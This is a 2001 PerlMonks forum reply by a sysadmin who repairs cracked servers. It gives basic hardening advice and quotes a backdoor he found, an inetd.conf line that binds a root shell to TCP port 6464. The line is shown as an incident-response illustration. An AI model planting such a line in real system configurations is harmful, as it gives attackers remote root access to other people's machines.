Do you know where your variables are? | |
PerlMonks |
Re: ACKKKKKKKKK! I Have been cracked!by petethered (Pilgrim) |
on Apr 03, 2001 at 17:47 UTC ( [id://69300]=note: print w/replies, xml ) | Need Help?? |
Ive been the person called in to repair dozens of cracked servers. Alot of times, when a box gets cracked its pure laziness. You should always keep an ear out for security patches. You should always block IPs based on hosts.allow and deny. You should always have MySQLs access tables defined, and not world accessable. Dont allow anyone who isnt trusted telnet/ssh access to your box ( once your in, your good as root ). Doing this prevents the script kiddies from getting in your box, But this will not prevent a REAL cracker from accessing your box. On a side note, I recently was called in to help fix a box and found the following backdoor installed. in inetd.conf: 6464 stream tcp nowait root /bin/sh sh -i So simple It was beautiful... a perfect back door that few people would catch. -pete
In Section
Meditations
|
|